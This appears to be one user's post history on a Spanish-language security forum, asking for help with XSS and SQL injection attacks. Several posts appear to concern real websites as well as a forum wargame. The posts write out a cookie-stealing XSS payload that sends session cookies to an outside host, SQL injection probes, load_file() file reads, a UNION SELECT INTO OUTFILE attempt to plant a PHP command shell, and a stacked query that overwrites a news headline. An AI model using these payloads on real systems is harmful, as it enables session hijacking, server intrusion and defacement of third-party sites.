elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5
21  Seguridad Informática / Nivel Web / Re: XSS Help!!! en: 10 Febrero 2010, 17:27 pm
De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="http://mysite.us/c.php?cookie="+ document.cookie;</script>

ya tambien lo e tratado y nada.
22  Seguridad Informática / Nivel Web / XSS Help!!! en: 10 Febrero 2010, 17:15 pm
Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!
23  Seguridad Informática / Nivel Web / Re: inyeccion sql????? en: 4 Julio 2009, 01:00 am
bueno seria bueno  que tratara de ver que base dato esta corriendo
primero pero para saber mas o menos usa
ejmplo
.php?id=1' order by 1--
.php?id=1' order by 1/*

solo ve cambiando el 1 por 2 3 cuatro hasta que tengas el error.

si necesitas mas ayuda solo deja saber.
24  Seguridad Informática / WarZone / Re: Algo gracioso en hackweb_carrito en: 8 Enero 2009, 17:58 pm
Dios pero den una pista con mas sentido
algo que por lo menos ponga a pensar!!!
25  Seguridad Informática / Nivel Web / Re: Sql injection! Ayuda con esto! en: 11 Diciembre 2008, 17:03 pm
Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off
26  Seguridad Informática / Nivel Web / Re: Sql injection! Ayuda con esto! en: 11 Diciembre 2008, 15:05 pm
gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!

Pero tambien encontre otra web esta ves el user es root@localhost perfecto!
Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE
creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE  o un buen manual.

UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1

gracias por adelantado!
27  Seguridad Informática / Nivel Web / Re: Sql injection! Ayuda con esto! en: 10 Diciembre 2008, 19:12 pm
Buen gracias por las respuesta! Estoy tratando de usera el load_file()  para ver que pasa gracias.

http://www.victima.com/noticias.php?id=1%20union%20select%201,2,3,load_file(concat(char(0x22)%2bchar(0x69)%2bchar(0x6e)%2bchar(0x64)%2bchar(0x65)%2bchar(0x78)%2bchar(0x2e)%2bchar(0x70)%2bchar(0x68)%2bchar(0x70)%2bchar(0x22))),5,6,7%20from%20noticias/*

No me da error pero tampocomo me muesta los datos me puede explicar porue no muestra los datos!
28  Seguridad Informática / Nivel Web / Sql injection! Ayuda con esto! en: 5 Diciembre 2008, 17:18 pm
http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre
29  Seguridad Informática / WarZone / Hack-Web_Carrito en: 19 Mayo 2008, 23:07 pm
Alguien me puede ayudar en el carito me dice tramposo y no se que hacer
30  Seguridad Informática / WarZone / Hack-Web_Atacame en: 19 Mayo 2008, 22:08 pm
Sirdarckcat hay punto estras si encuentro un XSS en una parte de la web donde no deberia?
Páginas: 1 2 [3] 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines